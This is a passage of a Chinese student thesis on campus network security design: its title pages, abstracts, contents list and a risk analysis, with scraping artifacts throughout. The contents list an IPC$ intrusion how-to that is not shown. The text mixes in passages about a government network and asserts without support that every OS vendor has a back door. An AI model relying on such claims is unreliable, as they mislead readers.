網(wǎng)絡(luò)安全系統(tǒng)設(shè)計畢業(yè)設(shè)計論文

1、<p><b>　　畢業(yè)設(shè)計（論文）</b></p><p>　　題目 網(wǎng)絡(luò)安全系統(tǒng)設(shè)計 </p><p>　　系 別 軟件工程系 </p><p>　　專 業(yè) 計算機網(wǎng)絡(luò)技術(shù)</p><p>　　畢業(yè)設(shè)計（論文）任務(wù)書</p><p>

2、　　軟件 系 11 屆 網(wǎng)絡(luò) 專業(yè)</p><p>　　畢業(yè)設(shè)計（論文）任務(wù)書</p><p>　　注：本任務(wù)書要求一式兩份，一份系部留存，一份報教務(wù)處實踐教學(xué)科。</p><p><b>　　中 文 摘 要</b></p><p>　　本文主要分析了校園網(wǎng)當(dāng)前所處的背景、特征、準(zhǔn)確、及時地了解網(wǎng)絡(luò)的運

3、行的狀況，并對校園網(wǎng)絡(luò)安全作出評價，是保障校園網(wǎng)絡(luò)安全的前提。本文通過分析校園網(wǎng)普遍存在的安全問題，然后結(jié)合校園網(wǎng)絡(luò)安全的需求，設(shè)計出安全的校園網(wǎng)絡(luò)安全系統(tǒng)。主要運用各種防火墻技術(shù)對校園網(wǎng)絡(luò)進(jìn)行分析和比較，闡述了防火墻系統(tǒng)的安全產(chǎn)品及使用原則。</p><p>　　關(guān)鍵詞：計算機網(wǎng)絡(luò)、校園網(wǎng)、網(wǎng)絡(luò)安全、網(wǎng)絡(luò)設(shè)計、防火墻</p><p><b>　　ANSTRACT</b&g

4、t;</p><p>　　This paper analyzes the current context in which the campus network, features, accurate and timely information on the status of the operation of the network, and to assess the campus network secu

5、rity, network security is to protect the campus premises. This paper analyzes the prevalence of campus network security issues, and then combined with the campus network security needs, design a safe campus network secur

6、ity system. Mainly through a variety of firewall technology on the campus network ana</p><p><b>　　朗讀</b></p><p>　　顯示對應(yīng)的拉丁字符的拼音</p><p>　　字典 - 查看字典詳細(xì)內(nèi)容</p><p>

7、;　　Keywords: computer network, network, network security, network design, firewall朗讀</p><p>　　顯示對應(yīng)的拉丁字符的拼音</p><p>　　字典 - 查看字典詳細(xì)內(nèi)容</p><p><b>　　朗讀</b></p><p>

8、　　顯示對應(yīng)的拉丁字符的拼音</p><p>　　字典 - 查看字典詳細(xì)內(nèi)容</p><p><b>　　目 錄</b></p><p>　　一、概述 - - - - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - 8</p><p>　?。ㄒ唬?/p>

9、計算機網(wǎng)絡(luò)安全的含義- - - - - - - - - - - - - - - - - - - - - - - - - 8</p><p>　?。ǘ┚W(wǎng)絡(luò)安全項目背景 - - - - - - - - - - - - - - - - - - - - - - - - - - 8</p><p>　?。ㄈ┚W(wǎng)絡(luò)安全項目的建設(shè)意義 - - - - - - - - - - - - - - - - -

10、 - - - - - - 8</p><p>　　二、需求分析- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9</p><p>　?。ㄒ唬┚W(wǎng)絡(luò)的現(xiàn)狀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -9</p><p>　

11、?。ǘ┚W(wǎng)絡(luò)的網(wǎng)絡(luò)安全現(xiàn)狀 - - - - - - - - - - - - - - - - - - - - - - - - - - 9</p><p>　?。ㄈ┚W(wǎng)絡(luò)的主要網(wǎng)絡(luò)安全威脅- - - - - - - - - - - - - - - - - - - - - - - - 9</p><p>　?。ㄋ模┚W(wǎng)絡(luò)的網(wǎng)絡(luò)安全需求分析- - - - - - - - - - - - - - -

12、- - - - - - - - - 9</p><p>　　1、物理安全風(fēng)險分析 - - - - - - - - - - - - - - - - - - - - - - - - - - 10</p><p>　　2、網(wǎng)絡(luò)平臺的安全風(fēng)險分析 - - - - - - - - - - - - - - - - - - - - - - - - 10</p><p>　　3、系

13、統(tǒng)的安全風(fēng)險分析 - - - - - - - - - - - - - - - - - - - - - - - - -10</p><p>　　4、應(yīng)用的安全風(fēng)險分析 - - - - - - - - - - - - - - - - - - - - - - - - -10</p><p>　　5、管理的安全風(fēng)險分析 - - - - - - - - - - - - - - - - - - - -

14、 - - - - -11</p><p>　　6、黑客攻擊 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 11</p><p>　　7、通用網(wǎng)關(guān)接口（CGI）漏洞 - - - - - - - - - - - - - - - - - - - - - - -11</p><p>　　8、惡意代碼

15、- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 11</p><p>　　9、病毒的攻擊 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 12</p><p>　　10、網(wǎng)絡(luò)的攻擊手段- - - - - - - - - - - - - - - - -

16、- - - - - - - - - - 12</p><p>　?。ㄎ澹┚W(wǎng)絡(luò)安全的系統(tǒng)目標(biāo)- - - - - - - - - - - - - - - - - - - - - - - - - - -12</p><p>　　三、總體規(guī)劃- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 12</p>&

17、lt;p>　?。ㄒ唬┌踩w系結(jié)構(gòu)- - - - - - - - - - - - - - - - - - - - - - - - - - - - - 12</p><p>　　1、 網(wǎng)絡(luò)結(jié)構(gòu)安全- - - - - - - - - - - - - - - - - - - - - - - - - - - - 12</p><p>　　2、 加強訪問控制- - - - - - - - - -

18、 - - - - - - - - - - - - - - - - - - 12 3、 安全檢測 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -12</p><p>　?。ǘ┌踩w系設(shè)計- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -12</p>

19、<p>　　1、網(wǎng)絡(luò)結(jié)構(gòu)安全- - - - - - - - - - - - - - - - - - - - - - - - - - - - 12</p><p>　　2、加強訪問控制- - - - - - - - - - - - - - - - - - - - - - - - - - - - 13</p><p>　　3、安全檢測 - - - - - - - - - - -

20、- - - - - - - - - - - - - - - - - - -13</p><p>　?。ㄈ┚W(wǎng)絡(luò)安全體系原則- - - - - - - - - - - - - - - - - - - - - - - - - - - 13</p><p>　　1、網(wǎng)絡(luò)信息安全的木桶原則- - - - - - - - - - - - - - - - - - - - - - - -13</p

21、><p>　　2、網(wǎng)絡(luò)信息安全的整體性原則- - - - - - - - - - - - - - - - - - - - - - - -13</p><p>　　3、安全性評價與平衡原則 - - - - - - - - - - - - - - - - - - - - - - - - -13</p><p>　　4、標(biāo)準(zhǔn)化與一致性原則- - - - - - - - - -

22、 - - - - - - - - - - - - - - - - 13</p><p>　　5、技術(shù)與管理相結(jié)合原則- - - - - - - - - - - - - - - - - - - - - - - - - 14</p><p>　　6、統(tǒng)籌規(guī)劃，分步實施原則- - - - - - - - - - - - - - - - - - - - - - - - -14</p>

23、<p>　　7、等級性原則- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -14</p><p>　　8、動態(tài)發(fā)展原則- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -14</p><p>　　9、易操作性原則- - - - - - - - -

24、 - - - - - - - - - - - - - - - - - - - - -14</p><p>　?。ㄋ模┌踩a(chǎn)品選型原則- - - - - - - - - - - - - - - - - - - - - - - - - - - -14</p><p>　　四、安全方案設(shè)計- - - - - - - - - - - - - - - - - - - - - - - - - - -

25、- - 15</p><p>　?。ㄒ唬├萌肭謾z測技術(shù)實施安全防護(hù) - - - - - - - - - - - - - - - - - - - - 15</p><p>　　1、建立ipc$連接在hack攻擊中的作用 - - - - - - - - - - - - - - - - - - -16</p><p>　　2、ipc$與空連接,139,445端口,默認(rèn)共

26、享的關(guān)系 - - - - - - - - - - - - - - -16</p><p>　　3、如何打開目標(biāo)的IPC$ - - - - - - - - - - - - - - - - - - - - - - - - 16</p><p>　　4、入侵模式- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -16<

27、;/p><p>　　5、 如何防范ipc$入侵- - - - - - - - - - - - - - - - - - - - - - - - - - -22</p><p>　?。ǘ┯梅阑饓夹g(shù)防止外網(wǎng)入侵 - - - - - - - - - - - - - - - - - - - - - - 22</p><p>　　1、基于路由器的防火墻- - - - - -

28、- - - - - - - - - - - - - - - - - - -23</p><p>　　2、用戶化的防火墻工具套- - - - - - - - - - - - - - - - - - - - - - -24</p><p>　　3、建立在通用操作系統(tǒng)上的防火墻- - - - - - - - - - - - - - - - - - - - -24</p><

29、;p>　　4、防火墻產(chǎn)品將網(wǎng)關(guān)與安全系統(tǒng)合二為一，其主要功能- - - -- - - - - - - 24</p><p>　?。ㄈ┦褂媒粨Q機端口隔離技術(shù)實現(xiàn)內(nèi)網(wǎng)間的隔離 - - - - - - - - - - - - - - - 25</p><p>　　1、基于VLAN的劃分與管理- - - - - - - - - - - - - - - - - - - - - - -25&

30、lt;/p><p>　　2、在交換機2960上實現(xiàn)內(nèi)網(wǎng)之間的通信- - - - - - - - - - - - - - - - - - 28</p><p>　　3、在Trunk方式下跨交換機的配置實現(xiàn)不同子網(wǎng)之間的隔離與通信- - - - - - - 30</p><p>　?。ㄋ模├寐酚善骷夹g(shù)實現(xiàn)外網(wǎng)與內(nèi)網(wǎng)之間的隔離與通信 - - - - - - - - - -

31、- - 35</p><p>　　1、路由器基本配置與分析 - - - - - - - - - - - - - - - - - - - - - - - - 36</p><p>　　2、配置IP地址 - - - - - - - - - - - - - - - - - - - - - - - - - - - - 36</p><p>　　3、配置ip路由協(xié)議(RIP,

32、OSPF,BGP,STATICS)- - - - - - - - - - - - - - - - 36</p><p>　　五、系統(tǒng)總體評估 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 38</p><p>　　謝辭 - - - - - - - - - - - - - - - - - - - - - - - - -

33、 - - - - - - - - - - - - 39</p><p>　　參考文獻(xiàn) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 40</p><p>　　網(wǎng) 絡(luò) 安 全 系 統(tǒng) 設(shè) 計</p><p><b>　　概述</b></p>

34、;<p>　　計算機網(wǎng)絡(luò)安全的含義 </p><p>　　網(wǎng)絡(luò)安全從其本質(zhì)上來講，就是網(wǎng)絡(luò)上的信息安全。從廣義上說，凡是涉及到網(wǎng)絡(luò)信息的保密性、完整性、可用性、真實性和可控性的相關(guān)技術(shù)和理論，都是網(wǎng)絡(luò)安全所要研究的領(lǐng)域。一般認(rèn)為，網(wǎng)絡(luò)安全是指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及其系統(tǒng)中的數(shù)據(jù)受到保護(hù)，不受偶然的或者惡意的原因而遭到破壞、更改、泄露，系統(tǒng)連續(xù)可靠正常運行，網(wǎng)絡(luò)服務(wù)不被中斷。 </p&

35、gt;<p>　　隨著網(wǎng)絡(luò)安全技術(shù)不斷發(fā)展，計算機網(wǎng)絡(luò)安全的具體含義會隨著使用者的變化而變化，使用者不同，對網(wǎng)絡(luò)安全的認(rèn)識和要求也就不同。例如從普通使用者的角度來說，可能僅僅希望個人隱私或機密信息在網(wǎng)絡(luò)上傳輸時受到保護(hù)，避免被竊聽、篡改和偽造； 而網(wǎng)絡(luò)提供商除了關(guān)心這些網(wǎng)絡(luò)信息安全外，還要考慮如何應(yīng)付突發(fā)的自然災(zāi)害、 軍事打擊等對網(wǎng)絡(luò)硬件的破壞，以及在網(wǎng)絡(luò)出現(xiàn)異常時如何恢復(fù)網(wǎng)絡(luò)通信， 保持網(wǎng)絡(luò)通信的連續(xù)性。  

36、      從本質(zhì)上來講，網(wǎng)絡(luò)安全包括組成網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及其在網(wǎng)絡(luò)上傳輸信息的安全性，使其不致 因偶然的或者惡意的攻擊遭到破壞，網(wǎng)絡(luò)安全既有技術(shù)方面的問題，也有管理方面的問題，兩方面相互補充，缺一不可。</p><p><b>　　網(wǎng)絡(luò)安全項目的背景</b></p><p>　　隨著信息化程度的提高，越

37、來越多的學(xué)校建立了校園網(wǎng)和網(wǎng)站，把校園的介紹、規(guī)劃、招生、研究成果等發(fā)布在網(wǎng)站，讓跟多的人了解自己的校園，甚至在網(wǎng)上即時進(jìn)行學(xué)術(shù)交流等。在網(wǎng)絡(luò)信息技術(shù)高度發(fā)展的今天，作為學(xué)校，為了方便學(xué)術(shù)交流、校友聯(lián)絡(luò)、招生報名、研究成果等的發(fā)布等，建設(shè)自己的網(wǎng)站和郵件系統(tǒng)是必須的。在當(dāng)前的信息互動交流中，電子郵件的應(yīng)用憑借其快速、靈活的特點，在整個互聯(lián)網(wǎng)應(yīng)用中有著舉足輕重的地位。</p><p>　　信息化程度的提高，極大地促

38、進(jìn)了教育事業(yè)的發(fā)展，但是隨之而來的卻是信息安全問題。校園網(wǎng)絡(luò)以廣域網(wǎng)絡(luò)作為支撐平臺，如何保障網(wǎng)絡(luò)安全成為不可避免的重大問題。</p><p>　　網(wǎng)絡(luò)安全性是一個涉及面很廣泛的問題，其中也 會涉及到是否構(gòu)成犯罪行為的問題。在其最簡單的形式中，它主要關(guān)心的是確保無關(guān)人員不能讀取，更不能修改傳送給其他接收者的信息。此時，它關(guān)心的對象是那 些無權(quán)使用，但卻試圖獲得遠(yuǎn)程服務(wù)的人。安全性也處理合法消息被截獲和重播的問題，以

39、及發(fā)送者是否曾發(fā)送過該條消息的問題。 大多數(shù)安全性問題的出現(xiàn)都是由于有惡意的人試圖獲得某種好處或損害某些人而故意引起的?？梢钥闯霰ＷC網(wǎng)絡(luò)安全不僅僅是使它沒有編程錯誤。它包括要防范那些聰明的，通常也是狡猾的、專業(yè)的，并且在時間和金錢上是很充足、富有的人。同時，必須清楚地認(rèn)識到，能夠制止偶然實施破壞行為的敵人的方法對那些慣于作案的老手來說，收效甚微。 網(wǎng)絡(luò)安全性可以被粗略地分為4個相互交織的部分：保密、鑒別、反拒認(rèn)以及完整性控制

40、。保密是保護(hù)信息不被未授權(quán)者訪問，這是人們提到的網(wǎng)絡(luò)安 全性時最常想到的內(nèi)容。鑒別主要指在揭示敏感信息或進(jìn)行事務(wù)處理之前先確認(rèn)對方的身份。反拒認(rèn)主要與簽名有關(guān)。保密和完整性通過使用注冊過的郵件和文件鎖 來實現(xiàn)。</p><p>　　（2）網(wǎng)絡(luò)安全項目的建設(shè)意義</p><p>　　網(wǎng)絡(luò)安全是網(wǎng)絡(luò)正常運行的前提。網(wǎng)絡(luò)安全不單是單點的安全，而是整個信息網(wǎng)的安全，需要從物理、網(wǎng)絡(luò)、系 統(tǒng)、應(yīng)用和

41、管理方面進(jìn)行立體的防護(hù)。要知道如何防護(hù)，首先需要了解安全風(fēng)險來自于何處。網(wǎng)絡(luò)安全系統(tǒng)必須包括技術(shù)和管理兩方面，涵蓋物理層、系統(tǒng)層、網(wǎng)絡(luò)層、應(yīng)用層和管理層各個層面上的諸多風(fēng)險類。無論哪個層面上的安全措施不到位，都會存在很大的安全隱患，都有可能造成網(wǎng)絡(luò)的中斷。根據(jù)國內(nèi)網(wǎng)絡(luò)系統(tǒng)的網(wǎng)絡(luò)結(jié)構(gòu)和應(yīng)用情況，應(yīng)當(dāng)從網(wǎng)絡(luò)安全、系統(tǒng)安全、應(yīng)用安全及管理安全等方面進(jìn)行全面地分析。</p><p>　　無論是在局域網(wǎng)還是在廣域網(wǎng)中，網(wǎng)絡(luò)

42、的安全措施應(yīng)是能全方位地杜絕各種不同的威脅和脆弱性，這樣才能確保網(wǎng)絡(luò)信息的保密性、完整性和可用性。根據(jù)網(wǎng)絡(luò)安全檢測軟件的實際測試情況顯示，一個沒有安全防護(hù)措施的大型網(wǎng)絡(luò)，其安全漏洞可達(dá)1500個左右。目前的網(wǎng)絡(luò)中雖然采用一些安全產(chǎn)品，有一套安全制度，但由于各種客觀的原因仍然存在種種安全上的問題。同時，由于網(wǎng)絡(luò)的安全狀況隨著時間變化而變化，因此自作安全考慮時，除了合理的使用和配置各種安全軟件、硬件產(chǎn)品外，日常的檢測和后續(xù)的服務(wù)也越來越受到

43、重視。</p><p><b>　　需求分析</b></p><p><b>　　網(wǎng)絡(luò)的現(xiàn)狀</b></p><p>　　校園網(wǎng)絡(luò)中學(xué)校為了滿足網(wǎng)絡(luò)用戶的需求，主要采用的是寬松的共享寬帶的上網(wǎng)管理方式。當(dāng)前很多流行的互聯(lián)網(wǎng)應(yīng)用都是采用P2P技術(shù)搶占高寬帶，造成網(wǎng)路寬帶的利用率分配不均衡，一些用戶長時間使用該類軟件，占據(jù)大量

44、的帶寬資源，自然會造成另一部分用戶網(wǎng)速慢、不能正常瀏覽網(wǎng)頁等現(xiàn)象。另外，還有就是網(wǎng)絡(luò)病毒的入侵、網(wǎng)絡(luò)攻擊使計算機的部分資源受到很大的攻擊，服務(wù)器受到攻擊，使信息部分流失。</p><p>　　為此，今后將逐步加強網(wǎng)絡(luò)高峰期出口策略的優(yōu)化，針對強占出口帶寬的網(wǎng)絡(luò)應(yīng)用給予一定的限制，保證充分調(diào)研的基礎(chǔ)上，增加一些有效地輔助設(shè)備來進(jìn)行網(wǎng)絡(luò)流量的管理，加強對帶寬侵蝕狀況的防御能力。增強防火墻的防御能力，定期對計算機進(jìn)行系

45、統(tǒng)補丁的安裝以及對殺毒軟件的更新。</p><p><b>　　網(wǎng)絡(luò)的網(wǎng)絡(luò)安全現(xiàn)狀</b></p><p>　　校園網(wǎng)絡(luò)通常是通過CERNET與Internet相連或直接與Internet相連，許多用戶每天都</p><p>　　要通過校園網(wǎng)訪問Internet資源，與此同時也為外網(wǎng)病毒進(jìn)入校園網(wǎng)打開了方便之門，</p><

46、p>　　Internet上的許多的資源都暗藏病毒，用戶下載的程序和電子郵件都可能帶有木馬和病毒。因此，大量的網(wǎng)絡(luò)病毒及各類攻擊隨之而來，不斷跟新的病毒與黑客攻擊手段對網(wǎng)絡(luò)安全造成了很大的威脅</p><p>　　校園網(wǎng)只考慮了對外服務(wù)器的安全性，對內(nèi)服務(wù)器的安全性則是暴露在內(nèi)部交換機上</p><p>　　的，隨時可能受到來自內(nèi)部網(wǎng)絡(luò)用戶的掃描、窺探和攻擊，這是很嚴(yán)重的問題，所以盡快

47、的對網(wǎng)絡(luò)作進(jìn)一步的安全保護(hù)措施是重要的。</p><p>　　另外，隨著上網(wǎng)人數(shù)的越來越多，病毒的傳播也是非常的廣泛，所以應(yīng)定期對學(xué)校學(xué)生計算機進(jìn)行系統(tǒng)漏洞的檢測、補丁的安裝以及對殺毒軟件定期進(jìn)行升級。</p><p>　　網(wǎng)絡(luò)的主要網(wǎng)絡(luò)安全威脅</p><p>　　1、來自外網(wǎng)的病毒和黑客攻擊</p><p>　　2、來自校園網(wǎng)絡(luò)內(nèi)部的攻擊

48、和病毒</p><p>　　3、操作系統(tǒng)的安全漏洞</p><p>　　4、管理方面存在的問題</p><p>　　網(wǎng)絡(luò)的網(wǎng)絡(luò)安全需求分析</p><p>　　隨著Internet網(wǎng)絡(luò)急劇擴大和上網(wǎng)用戶迅速增加，風(fēng)險變得更加嚴(yán)重和復(fù)雜。原來由單個計算機安全事故引起的損害可能傳播到其它系統(tǒng)，引起大范圍的癱瘓和損失；另外加上缺乏安全控制機制和對I

49、nternet安全政策的認(rèn)識不足，這些風(fēng)險正日益嚴(yán)重。 </p><p>　　針對政務(wù)信息網(wǎng)中存在的安全隱患，在進(jìn)行安全方案設(shè)計時，下述安全風(fēng)險我們必須要認(rèn)真考慮，并且要針對面臨的風(fēng)險，采取相應(yīng)的安全措施。下述風(fēng)險由多種因素引起，與政務(wù)網(wǎng)結(jié)構(gòu)和系統(tǒng)的應(yīng)用、局域網(wǎng)內(nèi)網(wǎng)絡(luò)服務(wù)器的可靠性等因素密切相關(guān)。下面列出部分這類風(fēng)險因素： </p><p>　　網(wǎng)絡(luò)安全可以從以下五個方面來理解：</

50、p><p>　　1. 網(wǎng)絡(luò)物理是否安全；</p><p>　　2. 網(wǎng)絡(luò)平臺是否安全；</p><p>　　3. 系統(tǒng)是否安全；</p><p>　　4. 應(yīng)用是否安全；</p><p>　　5. 管理是否安全。</p><p>　　1 、物理安全風(fēng)險分析 </p><p>

51、　　網(wǎng)絡(luò)的物理安全的風(fēng)險是多種多樣的。</p><p>　　網(wǎng)絡(luò)的物理安全主要是指地震、水災(zāi)、火災(zāi)等環(huán)境事故；電源故障；人為操作失誤或錯誤；設(shè)備被盜、被毀；電磁干擾；線路截獲。以及高可用性的硬件、雙機多冗余的設(shè)計、機房環(huán)境及報警系統(tǒng)、安全意識等。它是整個網(wǎng)絡(luò)系統(tǒng)安全的前提，在政務(wù)網(wǎng)內(nèi)，由于網(wǎng)絡(luò)的物理跨度不大，，只要制定健全的安全管理制度，做好備份，并且加強網(wǎng)絡(luò)設(shè)備和機房的管理，這些風(fēng)險是可以避免的。</p&

52、gt;<p>　　2、網(wǎng)絡(luò)平臺的安全風(fēng)險分析 </p><p>　　網(wǎng)絡(luò)結(jié)構(gòu)的安全涉及到網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)、網(wǎng)絡(luò)路由狀況及網(wǎng)絡(luò)的環(huán)境等。</p><p>　　(1) 公開服務(wù)器面臨的威脅 :</p><p>　　校園網(wǎng)內(nèi)公開服務(wù)器區(qū)（WWW、EMAIL等服務(wù)器）作為校園的信息發(fā)布平臺，一旦不能運行后者受到攻擊，對學(xué)校的聲譽影響巨大。同時公開服務(wù)器本身要為外界

53、服務(wù)，必須開放相應(yīng)的服務(wù)；每天，黑客都在試圖闖入Internet節(jié)點，這些節(jié)點如果不保持警惕，可能連黑客怎么闖入的都不知道，甚至?xí)蔀楹诳腿肭制渌军c的跳板。因此，規(guī)模比較大網(wǎng)絡(luò)的管理人員對Internet安全事故做出有效反應(yīng)變得十分重要。有必要將公開服務(wù)器、內(nèi)部網(wǎng)絡(luò)與外部網(wǎng)絡(luò)進(jìn)行隔離，避免網(wǎng)絡(luò)結(jié)構(gòu)信息外泄；同時還要對外網(wǎng)的服務(wù)請求加以過濾，只允許正常通信的數(shù)據(jù)包到達(dá)相應(yīng)主機，其它的請求服務(wù)在到達(dá)主機之前就應(yīng)該遭到拒絕。</p&g

54、t;<p>　　(2) 整個網(wǎng)絡(luò)結(jié)構(gòu)和路由狀況 :</p><p>　　安全的應(yīng)用往往是建立在網(wǎng)絡(luò)系統(tǒng)之上的。網(wǎng)絡(luò)系統(tǒng)的成熟與否直接影響安全系統(tǒng)成功的建設(shè)。在政務(wù)網(wǎng)絡(luò)系統(tǒng)中，只使用了一臺路由器，用作與Internet連結(jié)的邊界路由器，網(wǎng)絡(luò)結(jié)構(gòu)相對簡單，具體配置時可以考慮使用靜態(tài)路由，這就大大減少了因網(wǎng)絡(luò)結(jié)構(gòu)和網(wǎng)絡(luò)路由造成的安全風(fēng)險。 </p><p>　　3、系統(tǒng)的安全風(fēng)險分

55、析 </p><p>　　所謂系統(tǒng)的安全顯而易見是指整個局域網(wǎng)網(wǎng)絡(luò)操作系統(tǒng)、網(wǎng)絡(luò)硬件平臺是否可靠且值得信任。 </p><p>　　網(wǎng)絡(luò)操作系統(tǒng)、網(wǎng)絡(luò)硬件平臺的可靠性：對于中國來說，恐怕沒有絕對安全的操作系統(tǒng)可以選擇，無論是Microsoft的Windows NT或者其它任何商用UNIX操作系統(tǒng)，其開發(fā)廠商必然有其Back-Door。但是，可以對現(xiàn)有的操作平臺進(jìn)行安全配置、對操作和訪問權(quán)限

56、進(jìn)行嚴(yán)格控制，提高系統(tǒng)的安全性。因此，不但要選用盡可能可靠的操作系統(tǒng)和硬件平臺。而且，必須加強登錄過程的認(rèn)證（特別是在到達(dá)服務(wù)器主機之前的認(rèn)證），確保用戶的合法性；其次應(yīng)該嚴(yán)格限制登錄者的操作權(quán)限，將其完成的操作限制在最小的范圍內(nèi)。</p><p>　　4、應(yīng)用的安全風(fēng)險分析</p><p>　　應(yīng)用系統(tǒng)的安全跟具體的應(yīng)用有關(guān)，它涉及很多方面。應(yīng)用系統(tǒng)的安全是動態(tài)的、不斷變化的。應(yīng)用的安全

57、性也涉及到信息的安全性，它包括很多方面。</p><p>　　應(yīng)用系統(tǒng)的安全動態(tài)的、不斷變化的：應(yīng)用的安全涉及面很廣，以目前Internet上應(yīng)用最為廣泛的E-mail系統(tǒng)來說，其解決方案有幾十種，但其系統(tǒng)內(nèi)部的編碼甚至編譯器導(dǎo)致的BUG是很少有人能夠發(fā)現(xiàn)的，因此一套詳盡的測試軟件是相當(dāng)必須的。但是應(yīng)用系統(tǒng)是不斷發(fā)展且應(yīng)用類型是不斷增加的，其結(jié)果是安全漏洞也是不斷增加且隱藏越來越深。因此，保證應(yīng)用系統(tǒng)的安全也是一

58、個隨網(wǎng)絡(luò)發(fā)展不斷完善的過程。 </p><p>　　應(yīng)用的安全性涉及到信息、數(shù)據(jù)的安全性：信息的安全性涉及到：機密信息泄露、未經(jīng)授權(quán)的訪問、破壞信息完整性、假冒、破壞系統(tǒng)的可用性等。由于政務(wù)網(wǎng)跨度不大，絕大部分重要信息都在內(nèi)部傳遞，因此信息的機密性和完整性是可以保證的。對于有些特別重要的信息需要對內(nèi)部進(jìn)行保密的（比如辦公子網(wǎng)、檔案子網(wǎng)傳遞的重要信息）可以考慮在應(yīng)用級進(jìn)行加密，針對具體的應(yīng)用直接在應(yīng)用系統(tǒng)開發(fā)時進(jìn)行

59、加密。</p><p>　　5、管理的安全風(fēng)險分析 </p><p>　　管理是網(wǎng)絡(luò)安全中最重要的部分 </p><p>　　管理是網(wǎng)絡(luò)中安全最最重要的部分。責(zé)權(quán)不明，管理混亂、安全管理制度不健全及缺乏可操作性等都可能引起管理安全的風(fēng)險。責(zé)權(quán)不明，管理混亂，使得一些員工或管理員隨便讓一些非本地員工甚至外來人員進(jìn)入機房重地，或者員工有意無意泄漏一些重要信息，而管理上卻

60、沒有相應(yīng)制度來約束。</p><p>　　當(dāng)網(wǎng)絡(luò)出現(xiàn)攻擊行為或網(wǎng)絡(luò)受到其它一些安全威脅時（如內(nèi)部人員的違規(guī)操作等），無法進(jìn)行實時的檢測、監(jiān)控、報告與預(yù)警。同時，當(dāng)事故發(fā)生后，也無法提供黑客攻擊行為的追蹤線索及破案依據(jù)，即缺乏對網(wǎng)絡(luò)的可控性與可審查性。這就要求必須對站點的訪問活動進(jìn)行多層次的記錄，及時發(fā)現(xiàn)非法入侵行為。</p><p>　　建立全新網(wǎng)絡(luò)安全機制，必須深刻理解網(wǎng)絡(luò)并能提供直接的

61、解決方案，因此，最可行的做法是管理制度和管理解決方案的結(jié)合。</p><p><b>　　6、黑客攻擊 </b></p><p>　　黑客們的攻擊行動是無時無刻不在進(jìn)行的，而且會利用系統(tǒng)和管理上的一切可能利用的漏洞。公開服務(wù)器存在漏洞的一個典型例證，是黑客可以輕易地騙過公開服務(wù)器軟件，得到Unix的口令檔并將之送回。黑客侵入UNIX服務(wù)器后，有可能修改特權(quán)，從普通用戶

62、變?yōu)楦呒売脩?，一旦成功，黑客可以直接進(jìn)入口令檔。黑客還能開發(fā)欺騙程序，將其裝入UNIX服務(wù)器中，用以監(jiān)聽登錄會話。當(dāng)它發(fā)現(xiàn)有用戶登錄時，便開始存儲一個檔，這樣黑客就擁有了他人的賬戶和口令。這時為了防止黑客，需要設(shè)置公開服務(wù)器，使得它不離開自己的空間而進(jìn)入另外的目錄。另外，還應(yīng)設(shè)置組特權(quán)，不允許任何使用公開服務(wù)器的人訪問WWW頁面檔以外的東西。在這個企業(yè)的局域網(wǎng)內(nèi)我們可以綜合采用防火墻技術(shù)、Web頁面保護(hù)技術(shù)、入侵檢測技術(shù)、安全評估技術(shù)來

63、保護(hù)網(wǎng)絡(luò)內(nèi)的信息資源，防止黑客攻擊。</p><p>　　7、通用網(wǎng)關(guān)接口（CGI）漏洞 </p><p>　　有一類風(fēng)險涉及通用網(wǎng)關(guān)接口（CGI）腳本。許多頁面檔和指向其它頁面或站點的超連接。然而有些站點用到這些超連接所指站點尋找特定信息。搜索引擎是通過CGI腳本執(zhí)行的方式實現(xiàn)的。黑客可以修改這些CGI腳本以執(zhí)行他們的非法任務(wù)。通常，這些CGI腳本只能在這些所指WWW服務(wù)器中尋找，但如果

64、進(jìn)行一些修改，他們就可以在WWW服務(wù)器之外進(jìn)行尋找。要防止這類問題發(fā)生，應(yīng)將這些CGI腳本設(shè)置為較低級用戶特權(quán)。提高系統(tǒng)的抗破壞能力，提高服務(wù)器備份與恢復(fù)能力，提高站點內(nèi)容的防篡改與自動修復(fù)能力。</p><p><b>　　8、惡意代碼 </b></p><p>　　惡意代碼不限于病毒，還包括蠕蟲、特洛伊木馬、邏輯炸彈、和其它未經(jīng)同意的軟件。應(yīng)該加強對惡意代碼的檢測

65、。</p><p><b>　　9、病毒的攻擊 </b></p><p>　　計算機病毒一直是計算機安全的主要威脅。能在Internet上傳播的新型病毒，例如通過E-Mail傳播的病毒，增加了這種威脅的程度。病毒的種類和傳染方式也在增加，國際空間的病毒總數(shù)已達(dá)上萬甚至更多。當(dāng)然，查看文文件、瀏覽圖像或在Web上填表都不用擔(dān)心病毒感染，然而，下載可執(zhí)行檔和接收來歷不明的

66、E-Mail檔需要特別警惕，否則很容易使系統(tǒng)導(dǎo)致嚴(yán)重的破壞。典型的“CIH”病毒就是一可怕的例子。</p><p>　　10、網(wǎng)絡(luò)的攻擊手段 </p><p>　　一般認(rèn)為，目前對網(wǎng)絡(luò)的攻擊手段主要表現(xiàn)在：</p><p>　　非授權(quán)訪問：沒有預(yù)先經(jīng)過同意，就使用網(wǎng)絡(luò)或計算機資源被看作非授權(quán)訪問，如有意避開系統(tǒng)訪問控制機制，對網(wǎng)絡(luò)設(shè)備及資源進(jìn)行非正常使用，或擅自擴大

